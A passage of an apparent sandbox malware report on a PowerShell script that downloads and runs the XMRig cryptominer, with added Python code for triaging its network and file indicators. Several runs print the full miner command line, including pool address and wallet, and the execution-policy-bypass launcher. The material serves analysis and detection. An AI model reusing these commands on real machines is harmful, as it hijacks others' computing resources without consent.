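        "contacted": {ip: sorted(ds) for ip, ds in contacted.items()},
        # Connections to a known pool: the rows worth blocking on sight.
        "mining_pool_ips": sorted(ip for ip, ds in contacted.items()
                                  if any(is_pool_domain(d) for d in ds)),
        # Flows with no domain: attribute before blocking; often OS background traffic.
        "unattributed": sorted(ip for ip, ds in contacted.items() if not ds),
        # PTR lookups for addresses that never appear as a destination.
        "ptr_only": sorted(ptr_queries - set(contacted)),
    }


if __name__ == "__main__":
    for key, value in classify(parse_rows(NETWORK_TABLE)).items():
        print(key, value)
```

On the table above this yields one pool address (161.35.34.195), one unattributed flow (52.142.223.178:80) and a reverse lookup (13.227.111.52.in-addr.arpa, i.e. 52.111.227.13) for an address that the table never lists as a destination. The GitHub rows are the download of the miner archive and are not useful as blocklist entries. The unattributed and PTR-only addresses are, in the author's experience, as likely to be Windows' own traffic as the sample's, so they should be attributed (owner, reputation, whether the same address shows up in the other detonations on this page) before they are treated as indicators.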

Files

memory/3296-0-0x00007FFE19733000-0x00007FFE19734000-memory.dmp

memory/3296-5-0x00000213E6410000-0x00000213E6432000-memory.dmp

memory/3296-8-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

memory/3296-9-0x00000213E64C0000-0x00000213E6536000-memory.dmp

memory/3296-10-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fahehp2o.qba.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3296-25-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

memory/3296-48-0x00000213E69B0000-0x00000213E69C2000-memory.dmp

memory/3296-61-0x00000213E6490000-0x00000213E649A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1940-90-0x000001DDB2E00000-0x000001DDB2E20000-memory.dmp

memory/1940-91-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/3296-92-0x00007FFE19733000-0x00007FFE19734000-memory.dmp

memory/3296-93-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

memory/1940-94-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-95-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-96-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-97-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-98-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-99-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-100-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-101-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-102-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-103-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-104-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-105-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-106-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-107-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-108-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-109-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-110-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-111-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-112-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-113-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-114-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-115-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-116-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-117-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-118-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-119-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-120-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-121-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-122-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-123-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-124-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-125-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-126-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-127-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-128-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-129-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-130-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-131-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-132-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-133-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-134-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-135-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-136-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-137-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-138-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-139-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-140-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-141-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-142-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-143-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-144-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-145-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-146-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-147-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-148-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-149-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-150-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-151-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-152-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-153-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-154-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-155-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp
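Two things in the Files section above deserve a check before its hashes are copied into a case file. `__PSScriptPolicyTest_*.ps1` under `%TEMP%` is a file PowerShell creates itself to probe whether an AppLocker or WDAC policy constrains scripts; it is not dropped by the sample, and the hashes listed for it in this run are exactly those of the one-byte content `1`, while the other Windows 10/11 runs on this page list a different hash for the same kind of file. The long list of `memory/<pid>-<n>-<start>-<end>-memory.dmp` entries is more useful condensed per PID. The Python below is an added example, not part of the report; the watchlist is an assumption, and the file entries and dump names are constructed copies of a few of the ones above.

```python
"""Triage the 'Files' section: recognise PowerShell's own policy-probe file,
verify listed hashes, and condense the memory-region dumps per PID. Added
example, not part of the report; the watchlist is an assumption."""
import hashlib
import re
from collections import defaultdict

# Constructed copies of two hashed entries from the Files section above.
FILE_ENTRIES = [
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fahehp2o.qba.ps1",
     "md5": "c4ca4238a0b923820dcc509a6f75849b",
     "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
     "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "md5": "205ad9eb6acd6f58752899669b69fe74",
     "sha1": "bedb78ac5034259b86c2cbc915de2e861e8d7604",
     "sha256": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"},
]
# Constructed subset of the memory/... entries above.
MEMORY_DUMPS = [
    "memory/3296-0-0x00007FFE19733000-0x00007FFE19734000-memory.dmp",
    "memory/3296-9-0x00000213E64C0000-0x00000213E6536000-memory.dmp",
    "memory/1940-90-0x000001DDB2E00000-0x000001DDB2E20000-memory.dmp",
    "memory/1940-91-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp",
    "memory/1940-94-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp",
]
# Assumed watchlist keyed by SHA-256 (here: the dropped miner from this report).
WATCHLIST = {"2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda": "xmrig 6.21.3"}

POLICY_PROBE = re.compile(r"\\__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.ps1$", re.I)
DUMP_NAME = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9a-f]+)-0x(?P<end>[0-9a-f]+)-memory\.dmp$", re.I)


def hashes_of(data):
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha1": hashlib.sha1(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


def listed_hashes_match(entry, data):
    """True when all three hashes printed for the entry are those of `data`."""
    return all(entry[k] == v for k, v in hashes_of(data).items())


def classify_file(entry):
    if POLICY_PROBE.search(entry["path"]):
        # PowerShell writes this file itself to probe whether AppLocker/WDAC
        # constrains scripts; it is not dropped by the sample, and its content
        # (so its hash) differs between PowerShell builds.
        return "powershell-policy-probe"
    label = WATCHLIST.get(entry["sha256"].lower())
    return "watchlisted:" + label if label else "unknown"


def summarise_dumps(names):
    """Per PID: number of dumps, distinct address ranges, largest range size."""
    per_pid = defaultdict(lambda: {"dumps": 0, "regions": set(), "largest": 0})
    for name in names:
        m = DUMP_NAME.match(name)
        if not m:
            continue
        start, end = int(m["start"], 16), int(m["end"], 16)
        info = per_pid[int(m["pid"])]
        info["dumps"] += 1
        info["regions"].add((start, end))
        info["largest"] = max(info["largest"], end - start)
    return {pid: {"dumps": v["dumps"], "regions": len(v["regions"]),
                  "largest": v["largest"]} for pid, v in per_pid.items()}


if __name__ == "__main__":
    for entry in FILE_ENTRIES:
        print(classify_file(entry), entry["path"])
    print(summarise_dumps(MEMORY_DUMPS))
```

The per-PID summary makes the dump list readable: PID 3296 is the PowerShell host with small, scattered regions, while PID 1940 is the miner, whose repeated 0x00007FF6BD1A0000-0x00007FF6BDDD3000 range is one image-sized region dumped again and again as the sandbox re-scanned it, not dozens of distinct allocations.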

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:23

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(64 identical rows; no indicator, process or target was recorded for any match)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.43:443 tcp

Files

memory/2824-0-0x00007FFB0A173000-0x00007FFB0A175000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qd0wjw2a.0fw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2824-9-0x00000232732C0000-0x00000232732E2000-memory.dmp

memory/2824-10-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2824-11-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2824-12-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2824-14-0x00000232735D0000-0x00000232735E2000-memory.dmp

memory/2824-15-0x00000232735B0000-0x00000232735BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:34

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.21:443 tcp

Files

memory/3392-0-0x00007FF863373000-0x00007FF863375000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a03ecizu.1h2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:20

Platform

win7-20240221-en

Max time kernel

1562s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Network

N/A

Files

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:21

Platform

win10-20240404-en

Max time kernel

1795s

Max time network

1758s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5cj05rmj.tlq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1744-25-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/1744-48-0x0000021241570000-0x0000021241582000-memory.dmp

memory/1744-61-0x00000212413F0000-0x00000212413FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:45

Platform

win11-20240508-en

Max time kernel

1796s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1100-0-0x00007FFC11C53000-0x00007FFC11C55000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u30dmdyv.hgn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:16

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
